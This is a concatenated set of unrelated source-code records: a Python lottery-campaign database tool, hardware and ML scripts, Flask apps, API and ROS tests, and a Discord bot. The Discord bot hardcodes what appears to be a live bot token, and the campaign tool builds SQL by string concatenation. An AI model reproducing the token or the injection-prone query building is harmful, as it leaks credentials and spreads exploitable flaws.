商品详情的信息',' 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待; 2.卡券类奖品使用规则详见卡券介绍页
')'''\r\n award_onemore= ''',0,15,2,now(),now(),'再抽一次奖品','https://img4.adhudong.com/association/201802/22/49b99fca05649598059cc2dc733509f4.jpg',\r\n 5,NULL,NULL,NULL,'
商品详情的信息',' 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待; 2.卡券类奖品使用规则详见卡券介绍页
')'''\r\n award_lucky1= ''',0,70,3,now(),now(),'百元现金红包','https://img3.adhudong.com/association/201802/22/2c6f4700db7982447348db4d0960e3ad.png',\r\n 7,NULL,NULL,NULL,'
商品详情的信息',' 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待; 2.卡券类奖品使用规则详见卡券介绍页
')'''\r\n award_lucky2= ''',0,0,4,now(),now(),'20G流量','https://img2.adhudong.com/association/201802/22/d1c54c0eb8259f992f500015f67f8907.png',\r\n 7,NULL,NULL,NULL,'
商品详情的信息',' 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待; 2.卡券类奖品使用规则详见卡券介绍页
')'''\r\n award_lucky3 = ''',0,0,5,now(),now(),'第3个大奖品','https://img0.adhudong.com/association/201802/22/a4a40a28a4b21c1b50011102f07801a0.png',\r\n 7,NULL,NULL,NULL,'
商品详情的信息',' 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待; 2.卡券类奖品使用规则详见卡券介绍页
')'''\r\n award_lucky4 = ''',0,0,6,now(),now(),'第4个奖品','https://img0.adhudong.com/association/201802/22/a4a40a28a4b21c1b50011102f07801a0.png',\r\n 7,NULL,NULL,NULL,'
商品详情的信息',' 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待; 2.卡券类奖品使用规则详见卡券介绍页
')'''\r\n award_lucky5 = ''',0,0,7,now(),now(),'第5个奖品','https://img3.adhudong.com/association/201801/09/7f7b527213eccb7e2279b428379bf193.png',\r\n 7,NULL,NULL,NULL,'
商品详情的信息',' 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待; 2.卡券类奖品使用规则详见卡券介绍页
')'''\r\n award_lucky6 = ''',0,0,8,now(),now(),'第6个奖品','https://img2.adhudong.com/association/201801/09/8f3e1ae44f5f69d1f7d9730243f5a2ec.png',\r\n 7,NULL,NULL,NULL,'
商品详情的信息',' 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待; 2.卡券类奖品使用规则详见卡券介绍页
')'''\r\n\r\n award_6_list = [award_ths, award_onemore, award_lucky1, award_lucky2, award_lucky3, award_lucky4]\r\n award_8_list = [award_ths, award_onemore, award_lucky1, award_lucky2, award_lucky3, award_lucky4, award_lucky5, award_lucky6]\r\n if int(self.award_num) == 6:\r\n award_list = award_6_list\r\n else:\r\n award_list = award_8_list\r\n for award in award_list:\r\n award_sql = '''INSERT INTO act_award (act_id,award_id,award_rate,\r\n priority,update_time,create_time,show_copy,award_icon,act_award_type,begin_time,end_time,award_num,\r\n award_details,award_get_instructions)\r\n VALUES (''' + act_id + award\r\n print(award_sql)\r\n try:\r\n self.db.execute_sql(award_sql)\r\n self.db.mycommit()\r\n except:\r\n self.db.myrollback()\r\n if self.get_awards_count() == self.award_num:\r\n return '奖品添加成功,奖品个数为' + str(self.award_num)\r\n else:\r\n return '奖品添加失败'\r\n\r\n def __del__(self):\r\n self.db.close_cursor()\r\n self.db.close_db()\r\n\r\n\r\n def create_volidate_info(self):\r\n sql = \"select id from voyager.advertiser where type=2 and state in (2,3,5) limit 15\"\r\n adv_ids = self.db.execute_sql(sql)\r\n adv_id = ''\r\n post_url = \"http://api.admin.adhudong.com/adver/violationInsert.htm\"\r\n\r\n adv_count = len(adv_ids)\r\n for i in range(adv_count):\r\n adv_id = str(adv_ids[i][0])\r\n remark = '测试违规记录分页数据'+str(i)\r\n params = {'violationType': '1',\r\n 'violationRemark': remark,\r\n 'violationLink': 'http://music.baidu.com/songlist/tag/%E7%BA%AF%E9%9F%B3%E4%B9%90?orderType=1',\r\n 'advertiserId': adv_id\r\n }\r\n print(params)\r\n # re = self.s.post(post_url, data=params)\r\n # print(re.url)\r\n\r\n def get_list(self):\r\n url = \"http://api.admin.adhudong.com/advertiser/creativelist.htm?page=1&page_size=200\"\r\n re = self.s.get(url).json()['data']['data']\r\n re_len = len(re)\r\n # print(re)\r\n for i in range(re_len):\r\n print(re[i]['id'],re[i]['state'], re[i]['lastSubReviewTime'], re[i]['createTime'])\r\n # print(re[i]['state'])\r\n\r\n def adzone_act(self):\r\n dsql=r\"delete from voyager.adzone_act where adzone_id in ({});\".format(self.adzoneId)\r\n self.db.execute_sql(dsql)\r\n isql=r'''INSERT INTO voyager.adzone_act (adzone_id,act_id,act_time,priority,act_begin_time,act_end_time ) VALUES\r\n ( '{}','{}','1', '1','{}','{}' );'''.format(self.adzoneId, self.get_actId(), self.begin_time, self.end_time)\r\n self.db.execute_sql(isql)\r\n keysql = '''select app_key from voyager.base_adzone_info where id in ({})'''.format(self.adzoneId)\r\n key_re = self.db.execute_sql(keysql)\r\n return self.appkey + str(key_re[0][0])\r\n\r\nif __name__=='__main__':\r\n #为模板类型名称\r\n #__init__(self, templateTypeName, act_name, award_num):\r\n ct = TemplateActCreation('九宫格ce2',8,15,1810)\r\n #创建模板类型,create_template_type(self, classifi, locationAdress, preview=\"https://img0.adhudong.com/template/201802/24/999337a35a1a9169450685cc66560a05.png\",prizesNum=6)\r\n # ct.create_template_type('https://display.adhudong.com/new/nineBlockBox.html')\r\n\r\n ct.create_template('testTemp','https://display.adhudong.com/new/nineBlockBox.html')\r\n # ct.get_list()\r\n #创建模板 ct.create_template(templateName, templateStyleUrl)\r\n # ct.create_template('九宫格ce2',\"https://display.adhudong.com/new/nineBlockBox.html\",template_conf_items=r'''背景(750*1206)|bg|image||1|\\n\r\n# 全屏底色|bodyBgColor|string||0|\\n\r\n# 剩余次数文字颜色|leftTimesColor|string||0|/n\r\n# 剩余次数数字颜色|leftTimesNumColor|string||0|)''')\r\n # #创建活动, create_act(self, act_name,free_num=20, award_num=6)\r\n # ct.create_act()\r\n # #创建活动关联的奖品,\r\n # 
ct.create_awards()\r\n","sub_path":"business_modle/querytool/create_template.py","file_name":"create_template.py","file_ext":"py","file_size_in_byte":16467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"529783187","text":"#!/usr/bin/env python\n\nimport RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM) # use GPIO Number\n\nBZ1 = 13 # BZ1 --> GPIO13\nGPIO.setup(BZ1, GPIO.OUT) # set GPIO13 output\n\nbuzzer = GPIO.PWM(BZ1, 1000) # set BZ1 1000 Hz\n\nbuzzer.start(50) # start BZ1 duty 50%\nprint(\" buzzer 1000 Hz ,duty 50 %\")\ntime.sleep(3)\n\nbuzzer.ChangeFrequency(500) # change frequency 500 Hz\nprint(\" change 500 Hz \")\ntime.sleep(3)\n\nbuzzer.ChangeDutyCycle(10) # change duty cycle 10 %\nprint(\" duty 10 % \")\ntime.sleep(3)\n\nbuzzer.stop() # stop buzzer\nGPIO.cleanup()\n\n","sub_path":"python/buzzur/bz_sample1.py","file_name":"bz_sample1.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619182044","text":"#!/usr/bin/python3\n\nfrom brownie import *\nfrom scripts.deployment import main\n\n\ndef setup():\n config['test']['always_transact'] = False\n main(NFToken)\n global token, issuer\n token = NFToken[0]\n issuer = IssuingEntity[0]\n\n\ndef mint_issuer():\n '''mint to issuer'''\n token.mint(issuer, 1000, 0, \"0x00\", {'from': a[0]})\n _check_countries()\n token.mint(issuer, 9000, 0, \"0x00\", {'from': a[0]})\n _check_countries()\n\ndef burn_issuer():\n '''burn from issuer'''\n token.mint(issuer, 10000, 0, \"0x00\", {'from': a[0]})\n token.burn(1, 2001, {'from': a[0]})\n _check_countries()\n token.burn(2001, 10001, {'from': a[0]})\n _check_countries()\n\n\ndef mint_investors():\n '''mint to investors'''\n _check_countries()\n token.mint(a[1], 1000, 0, \"0x00\", {'from': a[0]})\n _check_countries(one=(1, 1, 0))\n token.mint(a[1], 1000, 0, \"0x00\", {'from': a[0]})\n token.mint(a[2], 1000, 0, \"0x00\", {'from': a[0]})\n token.mint(a[3], 1000, 0, \"0x00\", {'from': a[0]})\n _check_countries(one=(2, 1, 1), two=(1, 1, 0))\n token.mint(a[1], 996000, 0, \"0x00\", {'from': a[0]})\n _check_countries(one=(2, 1, 1), two=(1, 1, 0))\n\ndef burn_investors():\n '''burn from investors'''\n token.mint(a[1], 5000, 0, \"0x00\", {'from': a[0]})\n token.mint(a[2], 3000, 0, \"0x00\", {'from': a[0]})\n token.mint(a[3], 2000, 0, \"0x00\", {'from': a[0]})\n token.burn(1, 1001, {'from': a[0]})\n _check_countries(one=(2, 1, 1), two=(1, 1, 0))\n token.burn(1001, 5001, {'from': a[0]})\n _check_countries(one=(1, 0, 1), two=(1, 1, 0))\n token.burn(5001, 8001, {'from': a[0]})\n token.burn(8001, 10001, {'from': a[0]})\n _check_countries()\n\ndef _check_countries(one=(0,0,0),two=(0,0,0),three=(0,0,0)):\n check.equal(\n issuer.getInvestorCounts()[0][:3],\n (\n one[0]+two[0]+three[0],\n one[1]+two[1]+three[1],\n one[2]+two[2]+three[2]\n )\n )\n check.equal(issuer.getCountry(1)[1][:3], one)\n check.equal(issuer.getCountry(2)[1][:3], two)\n check.equal(issuer.getCountry(3)[1][:3], three)","sub_path":"tests/nft/mint_burn/investor_counts.py","file_name":"investor_counts.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"317447446","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 6 19:11:40 2019\n\n@author: rhari\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as 
sns\n\ndiabetes=pd.read_csv('Diabetes.csv')\ndiabetes.columns\ndiabetes.head\ndiabetes.describe()\nfeature_names=['Pregnancies','Glucose','BloodPressure','SkinThickness','Insulin','BMI','DiabetesPedigreeFunction','Age']\nX=diabetes[feature_names]\ny=diabetes.Outcome\n\nprint(\"Diabetes data set dimensions:{}\".format(diabetes.shape))\n\n#Visualising the dataset\ncorr=diabetes.corr()\nprint(corr)\nsns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns)\n\nsns.countplot(x=diabetes['Age'])\nsns.countplot(x=diabetes['Age'], hue=diabetes['Outcome'])\nsns.countplot(diabetes['Outcome'])\n\nplt.scatter(diabetes['Age'], diabetes['BMI'])\nplt.xlabel('Age')\nplt.ylabel('BMI')\nplt.show()\n\ndiabetes.groupby('Outcome').size()\ndiabetes.hist(bins=50, figsize=(20,15))\nplt.show()\n\n#Data cleaning\ndiabetes.isnull().sum()\ndiabetes.isna().sum()\n\nmedian_bmi=diabetes['BMI'].median()\ndiabetes['BMI']=diabetes['BMI'].replace(to_replace=0, value=median_bmi)\n\nmedian_bloodp=diabetes['BloodPressure'].median()\ndiabetes['BloodPressure']=diabetes['BloodPressure'].replace(to_replace=0, value=median_bloodp)\n\nmedian_gluc=diabetes['Glucose'].median()\ndiabetes['Glucose']=diabetes['Glucose'].replace(to_replace=0, value=median_gluc)\n\nmedian_skin=diabetes['SkinThickness'].median()\ndiabetes['SkinThickness']=diabetes['SkinThickness'].replace(to_replace=0, value=median_skin)\n\nmedian_ins=diabetes['Insulin'].median()\ndiabetes['Insulin']=diabetes['Insulin'].replace(to_replace=0, value=median_ins)\n\n#Feature selection\nfrom sklearn.feature_selection import SelectKBest, chi2\nfeature_ranking=SelectKBest(chi2, k=5)\nfit=feature_ranking.fit(X,y)\nfmt = '%-8s%-20s%s'\n\nprint(fmt % ('', 'Scores', 'Features'))\nfor i, (score, feature) in enumerate(zip(feature_ranking.scores_, X.columns)):\n print(fmt % (i, score, feature))\n \nplt.bar(feature_names ,feature_ranking.scores_)\nplt.xlabel('Features', color='red')\nplt.ylabel('Feature Score', color='red')\nplt.show()\n\n#Splitting\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test= train_test_split(X,y, stratify=diabetes.Outcome, random_state=0)\nnames=[]\nscores=[]\n\n#Model Selection\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import accuracy_score\n\n#Applying K-Nearest Neighbors Model\nfrom sklearn.neighbors import KNeighborsClassifier\nclassifier1=KNeighborsClassifier()\nclassifier1.fit(X_train, y_train)\ny_pred=classifier1.predict(X_test)\n\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import f1_score\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test, y_pred))\nnames.append(\"K-Nearest Neighbor\")\n\n#Applying Naive Bayes Model\nfrom sklearn.naive_bayes import GaussianNB\nclassifier2=GaussianNB()\nclassifier2.fit(X_train,y_train)\ny_pred=classifier2.predict(X_test)\n\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test,y_pred))\nnames.append(\"Naive Bayes\")\n\n#Applying Logistic Regression Model\nfrom sklearn.linear_model import LogisticRegression\nclassifier3=LogisticRegression()\nclassifier3.fit(X_train, y_train)\ny_pred=classifier3.predict(X_test)\n\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test, y_pred))\nnames.append(\"Logistic Regression\")\n\n#Applying Decision Tree Model\nfrom sklearn.tree import 
DecisionTreeClassifier\nclassifier4=DecisionTreeClassifier(random_state=0)\nclassifier4.fit(X_train, y_train)\ny_pred=classifier4.predict(X_test)\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test, y_pred))\nnames.append('Decision Tree')\n\n#Applying Random Forest Model\nfrom sklearn.ensemble import RandomForestClassifier\nrf=RandomForestClassifier(n_estimators=100, random_state=0)\nrf.fit(X_train, y_train)\ny_pred=rf.predict(X_test)\nconf_matrix = confusion_matrix(y_test,y_pred)\nprint(conf_matrix)\nprint(f1_score(y_test,y_pred))\n\nscores.append(accuracy_score(y_test, y_pred))\nnames.append('Random Forest')\n\nFinal=pd.DataFrame({'Name':names,'Score':scores})\nprint(Final)\n\naxis=sns.barplot(x='Name', y='Score', data=Final)\naxis.set(xlabel='Model',ylabel='Accuracy')\n\nfor p in axis.patches:\n height=p.get_height()\n axis.text(p.get_x()+p.get_width()/2,height+0.005,'{:1.4f}'.format(height), ha=\"center\")\nplt.show()\n\n\n\n\n\n","sub_path":"Machine_Learning/Project/Report_18BCE1010/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"259690710","text":"from flask import Flask , render_template, request, session\n# the above sessin is the native session that store cookies in client side\n\n# the session below is the flask flask session, extension in flask that store info in the server side\nfrom flask_session import Session\n\n\napp = Flask(__name__)\n\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession (app)\n\n# notes = []\n\n\n@app.route('/', methods=[\"GET\",\"POST\"])\ndef index():\n\t# return \"Hello, World!\n\n\t# headline = \"My page!\"\n\n\t# return render_template('index.html', headline=headline)\n\t# names = ['Alice','Bob', 'Chalie', 'David', 'Hung Om']\n\n\t# return render_template('index.html')\n\t# session[\"notes\"] = []\n\n\tif session.get(\"notes\") is None:\n\t\t# if there is no session stored in the note session the empty list is created to begin.\n\t\tsession[\"notes\"] = []\n\n\tif request.method == \"POST\":\n\t\t# if the session is post(new note is added)\n\t\tnote = request.form.get(\"note\")\n\t\t# this line will get the data(note in the form)\n\t\t# add in the session by appending it in the list\n\t\tsession[\"notes\"].append(note)\n\n\treturn render_template(\"index.html\", notes=session[\"notes\"])\n\n@app.route('/more')\ndef more():\n\treturn render_template('more.html')\n\n\n\n# @app.route('/hello', methods=[\"GET\",\"POST\"])\n# def hello():\n# \tif request.method==\"GET\":\n# \t\treturn \"Please submit the form intead.\"\n# \telse:\n# \t\tname = request.form.get(\"name\")\n# \t\treturn render_template(\"hello.html\", name=name)\n\n\n\n\n# @app.route('/david')\n\n# def david():\n# \treturn \"Hello , David!\"\n\n# @app.route('/maria')\n# def maria():\n# # \treturn \"Hello Maria!\"\n\n# @app.route('/')\n# def hello(name):\n# \treturn \"hello , {}!\".format(name)","sub_path":"CS50-Exercises/Flask/app/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"112326134","text":"import pytest\nfrom requests import post, get\n\nserver_url = 'http://localhost:5000'\n\ndef pytest_namespace():\n return {\n 'newly_created_user_id': None\n }\n\ndef test_user_create_account():\n 
params = {\n 'email': 'aasdfaagfhfsafasd@mail.com', \n 'password': 'JOHNSON',\n 'first_name': 'Boris',\n 'last_name':'Johnson',\n }\n api_url = server_url + '/user/create-account'\n\n response = post(api_url, json = params)\n print(\"DEBUG\")\n print(response.text)\n pytest.newly_created_user_id = response.json()[\"_id\"]\n assert response.status_code == 200\n\n response = post(api_url, json = params)\n assert response.status_code == 400\n\n\ndef test_user_info_edit():\n params = {\n 'account_id': pytest.newly_created_user_id, \n 'email': 'Johnson@mail.com', \n 'password': \"JOHNSON\", \n 'first_name': 'Jack', \n 'last_name': 'Biden',\n }\n api_url = server_url + '/user/update-account-info'\n\n response = post(api_url, json = params)\n assert response.status_code == 200\n\n params = {\n 'account_id': pytest.newly_created_user_id\n }\n\n api_url = server_url + '/login/get-account-info'\n\n response = post(api_url, json = params)\n assert response.status_code == 200\n assert response.json()['email'] == 'Johnson@mail.com'\n assert response.json()['first_name'] == 'Jack'\n assert response.json()['last_name'] == 'Biden'\n\n\ndef test_user_delete():\n params = {\n 'description': 'This pair of Chinese republic period miniature porcelain vases',\n 'item_name': 'Pair Chinese Republic', \n 'seller_id': pytest.newly_created_user_id, \n 'starting_price': 500.0, \n 'auction_start_time': 1606432462, \n 'auction_end_time': 1606583144, \n 'category_id': 9,\n 'condition': 2,\n 'image_url': \"https://www.flaticon.com/svg/static/icons/svg/914/914832.svg\",\n 'shipping_cost': 7.99\n }\n api_url = server_url + '/item/create-item'\n response = post(api_url, json = params)\n newly_created_item_id = response.json()[\"item_id\"]\n assert response.status_code == 200\n\n\n params = {\n 'account_id': pytest.newly_created_user_id\n }\n api_url = server_url + '/user/delete-account'\n\n response = post(api_url, json = params)\n assert response.status_code == 200\n \n response = post(api_url, json = params)\n assert response.status_code == 400\n\n params = {\n 'item_id': newly_created_item_id\n }\n\n api_url = server_url + '/item/get-item-info'\n response = post(api_url, json = params)\n record = response.json()\n assert response.status_code == 400\n\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"544913798","text":"import discord\nimport asyncio\nfrom discord import Guild, message, Member, User\n\nimport os\nimport sys\n\nclient = discord.Client()\n\n###############################################################################################\n\n# DEFAULT: 0,\n# AQUA: 1752220,\n# GREEN: 3066993,\n# BLUE: 3447003,\n# PURPLE: 10181046,\n# GOLD: 15844367,\n# ORANGE: 15105570,\n# RED: 15158332,\n# GREY: 9807270,\n# DARKER_GREY: 8359053,\n# NAVY: 3426654,\n# DARK_AQUA: 1146986,\n# DARK_GREEN: 2067276,\n# DARK_BLUE: 2123412,\n# DARK_PURPLE: 7419530,\n# DARK_GOLD: 12745742,\n# DARK_ORANGE: 11027200,\n# DARK_RED: 10038562,\n# DARK_GREY: 9936031,\n# LIGHT_GREY: 12370112,\n# DARK_NAVY: 2899536,\n# LUMINOUS_VIVID_PINK: 16580705,\n# DARK_VIVID_PINK: 12320855\n\n################################################################################################\n\nautoroles = {\n 718493315405840495: {'memberroles': [719112492881674260], 'botroles': [718793348688773220]}\n\n}\n\n\n@client.event\nasync def on_ready():\n print('Der Bot ist eingeloggt als User -> 
{}'.format(client.user.name))\n client.loop.create_task(status_task())\n\n\nasync def status_task():\n while True:\n await client.change_presence(activity=discord.Game('⋙ Vision Crapter ⋘'), status=discord.Status.online)\n await asyncio.sleep(5)\n await client.change_presence(activity=discord.Game('》+help《'), status=discord.Status.online)\n await asyncio.sleep(5)\n\n\n@client.event\nasync def on_member_join(member):\n guild: Guild = member.guild\n if not member.bot:\n channel = discord.utils.get(member.guild.channels, name=\"\") # <--- Channel-Name\n embed = discord.Embed(title=\"⋙ Form-Writer ⋘\", color=1752220)\n\n embed.set_footer(text=\"[]\")\n embed.set_thumbnail(url=f\"{member.avatar_url}\")\n mess = await channel.send(embed=embed)\n guild: Guild = member.guild\n\n autoguild = autoroles.get(member.guild.id)\n if autoguild and autoguild['memberroles']:\n for roleId in autoguild['memberroles']:\n role = guild.get_role(roleId)\n if role:\n await member.add_roles(role, reason='AutoRoles', atomic=True)\n else:\n autoguild = autoroles.get(member.guild.id)\n if autoguild and autoguild['botroles']:\n for roleId in autoguild['botroles']:\n role = guild.get_role(roleId)\n if role:\n await member.add_roles(role, reason='AutoRoles', atomic=True)\n\n@client.event\nasync def on_message(message):\n if message.content.startswith('!userinfo'):\n args = message.content.split(' ')\n if len(args) == 2:\n member: Member = discord.utils.find(lambda m: args[1] in m.name, message.guild.members)\n if member:\n embed = discord.Embed(title='Userinfo für {}'.format(member.name),\n description='Dies ist eine Userinfo für den User {}'.format(member.mention),\n color=0x22a7f0)\n embed.add_field(name='Server beigetreten', value=member.joined_at.strftime('%d/%m/%Y, %H:%M:%S'),\n inline=True)\n embed.add_field(name='Discord beigetreten', value=member.created_at.strftime('%d/%m/%Y, %H:%M:%S'),\n inline=True)\n rollen = ''\n for role in member.roles:\n if not role.is_default():\n rollen += '{} \\r\\n'.format(role.mention)\n if rollen:\n embed.add_field(name='Rollen', value=rollen, inline=True)\n embed.set_thumbnail(url=member.avatar_url)\n embed.set_footer(text='Ich bin ein EmbedFooter.')\n mess = await message.channel.send(embed=embed)\n\n\n\nclient.run(\"NzI0NjA4OTc2MjU1MzIwMTI1.XvCqxg.guGIfv2NjQBuNpsOzaW-exwtAcM\")\n","sub_path":"puplicbot.py","file_name":"puplicbot.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48815200","text":"class Queens(object):\n __slots__ = ('__nqueens')\n\n def __init__(self, nqueens):\n assert isinstance(nqueens, int) and nqueens > 0, \\\n 'An positive integer is required here.'\n self.__nqueens = nqueens\n \n def __conflict(self, nextY, states):\n nextX = len(states)\n for stateX, stateY in enumerate(states):\n if abs(nextY - stateY) in (0, nextX - stateX):\n return True\n return False\n \n def __queens(self, nqueens, states=()):\n for nextY in range(self.__nqueens):\n if not self.__conflict(nextY, states):\n if len(states) + 1 == self.__nqueens:\n yield (nextY,)\n else:\n for result in self.__queens(nqueens, states + (nextY,)):\n yield (nextY,) + result\n\n def __iter__(self):\n return self.__queens(self.__nqueens)\n","sub_path":"python/queens.py","file_name":"queens.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332367542","text":"from typing import List\n\nclass TreeNode:\n def 
__init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n count=0\n if(len(preorder)>0):\n node=TreeNode(preorder[count])\n ind=inorder.index(preorder[count])\n rig=inorder[ind+1:]\n lef=inorder[:ind]\n def insert_right(root,right,y):\n no=None\n index=None\n for i in preorder[y+1:]:\n if(i in right):\n no=i\n index=right.index(no)\n break\n while(root.right is not None):\n root=root.right\n root.right=TreeNode(no)\n le=right[:index]\n ri=right[index+1:]\n if(len(le)>0):\n insert_left(root.right,le,y+1)\n if(len(ri)>0):\n insert_right(root.right,ri,y+1)\n\n\n\n def insert_left(root,left,y):\n no=None\n inde=None\n for i in preorder[y+1:]:\n if(i in left):\n no=i\n index=left.index(no)\n break\n while(root.left is not None):\n root=root.left\n root.left=TreeNode(no)\n le=left[:index]\n ri=left[index+1:]\n if(len(le)>0):\n insert_left(root.left,le,y+1)\n if(len(ri)>0):\n insert_right(root.left,ri,y+1)\n\n\n if(len(lef)>0):\n insert_left(node,lef,count)\n if(len(rig)>0):\n insert_right(node,rig,count)\n\n return node\n\n\n\n","sub_path":"problem_106.py","file_name":"problem_106.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314339732","text":"#!/usr/bin/env python3\n\n\"\"\"\ntest_onboard_router - unit tests for onboard_router.py\noffline tests - not requiring the ROS node itself to run.\n\n\"\"\"\n\n\nimport os\n\nimport pytest\nimport rospkg\nfrom std_msgs.msg import Bool\n\nfrom interactivespaces_msgs.msg import GenericMessage\nfrom lg_msg_defs.msg import StringArray\nfrom lg_keyboard import OnboardRouter\n\n\nDIRECTOR_MESSAGE_NO_WINDOWS = \"\"\"\n {\n \"description\": \"bogus\",\n \"duration\": 0,\n \"name\": \"test whatever\",\n \"resource_uri\": \"bogus\",\n \"slug\": \"test message\"\n }\"\"\"\n\nDIRECTOR_MESSAGE = \"\"\"\n {\n \"description\": \"bogus\",\n \"duration\": 0,\n \"name\": \"test whatever\",\n \"resource_uri\": \"bogus\",\n \"slug\": \"test message\",\n \"windows\": [\n {\n \"activity\": \"mirror\",\n \"height\": 1080,\n \"presentation_viewport\": \"center\",\n \"assets\": [\n ],\n \"width\": 450,\n \"height\": 800,\n \"x_coord\": 0,\n \"y_coord\": 0,\n\n \"activity_config\": {\n \"viewport\": \"center\",\n \"route_touch\": true\n }\n }\n ]\n }\"\"\"\n\n\nclass MockActivatePublisher(object):\n\n def __init__(self):\n self.msgs = []\n\n def publish(self, msgs):\n self.msgs.append(msgs)\n\n\nclass TestOnboardRouter(object):\n\n def setUp(self):\n self.publisher = MockActivatePublisher()\n self.msg = GenericMessage()\n self.msg.type = \"json\"\n self.router = OnboardRouter(default_viewport=[\"wall\"],\n onboard_activate_publisher=self.publisher)\n\n def test_handle_scene_no_windows(self):\n \"\"\"\n Upon sending a director message with no windows defined,\n the router publishes empty StringArray\n\n \"\"\"\n self.msg.message = DIRECTOR_MESSAGE_NO_WINDOWS\n self.router.handle_scene(self.msg)\n assert self.publisher.msgs[0].strings == []\n\n def test_hand_scene_with_windows(self):\n \"\"\"\n Upon sending a director message with windows,\n the onboard shall first be shut.\n Assert on correct viewports settings.\n\n \"\"\"\n self.msg.message = DIRECTOR_MESSAGE\n assert self.router.default_viewport == self.router.active_viewport == [\"wall\"]\n self.router.handle_scene(self.msg)\n assert self.publisher.msgs[0].strings == []\n assert self.router.active_viewport == 
[\"center\"]\n\n def test_handle_visibility_hide_onboard(self):\n msg = Bool(data=False)\n assert self.router.last_state is None\n self.router.handle_visibility(msg)\n assert self.router.last_state is False\n assert self.publisher.msgs[0].strings == []\n # check that the hide message was sent just once\n assert len(self.publisher.msgs) == 1\n # check that repeatedly sending messages of the same value\n # won't get processed multiple times but only once\n for _ in range(10):\n self.router.handle_visibility(msg)\n assert self.router.last_state is False\n assert self.publisher.msgs[0].strings == []\n # check that the hide message was sent just once\n assert len(self.publisher.msgs) == 1\n\n def test_handle_visibility_show_onboard(self):\n msg = Bool(data=True)\n assert self.router.last_state is None\n self.router.handle_visibility(msg)\n assert self.router.last_state is True\n assert self.publisher.msgs[0].strings == [\"wall\"]\n # check that the hide message was sent just once\n assert len(self.publisher.msgs) == 1\n # check that repeatedly sending messages of the same value\n # won't get processed multiple times but only once\n for _ in range(10):\n self.router.handle_visibility(msg)\n assert self.router.last_state is True\n assert self.publisher.msgs[0].strings == [\"wall\"]\n # check that the hide message was sent just once\n assert len(self.publisher.msgs) == 1\n\n\nif __name__ == \"__main__\":\n test_pkg = \"lg_keyboard\"\n test_name = \"test_onboard_router\"\n test_dir = os.path.join(rospkg.get_test_results_dir(env=None), test_pkg)\n pytest_result_path = os.path.join(test_dir, \"rosunit-%s.xml\" % test_name)\n # run only itself\n test_path = os.path.abspath(os.path.abspath(__file__))\n pytest.main(\"-vv -rfsX -s --junit-xml=%s %s\" % (pytest_result_path, test_path))\n","sub_path":"lg_keyboard/test/offline/test_onboard_router.py","file_name":"test_onboard_router.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"647370975","text":"from flask import Flask\nfrom flask_assistant import Assistant, ask, tell\n\napp = Flask(__name__)\nassist = Assistant(app)\n\nred_price = 90\ngreen_price =120\n\ndef checkout(x, y):\n checkout = x * red_price + y * green_price\n return checkout\n\n@assist.action('Default Welcome Intent')\ndef greet_and_start():\n speech = \"いらっしゃい、赤りんごと青りんごがおすすめですよ。\"\n return ask(speech)\n\n@assist.action('CalcIntent',mapping={'num_1': 'number_1','num_2': 'number_2','red_apple': 'list_of_red','green_apple': 'list_of_green'})\ndef calc(num_1,num_2,red_apple,green_apple):\n if not red_apple == \"赤りんご\":\n checkout_all = int(num_2) * green_price\n speech = '{}{}個でお会計{}円になります'.format(green_apple,num_2,checkout_all)\n return tell(speech)\n elif not green_apple == \"青りんご\":\n checkout_all = int(num_1) * 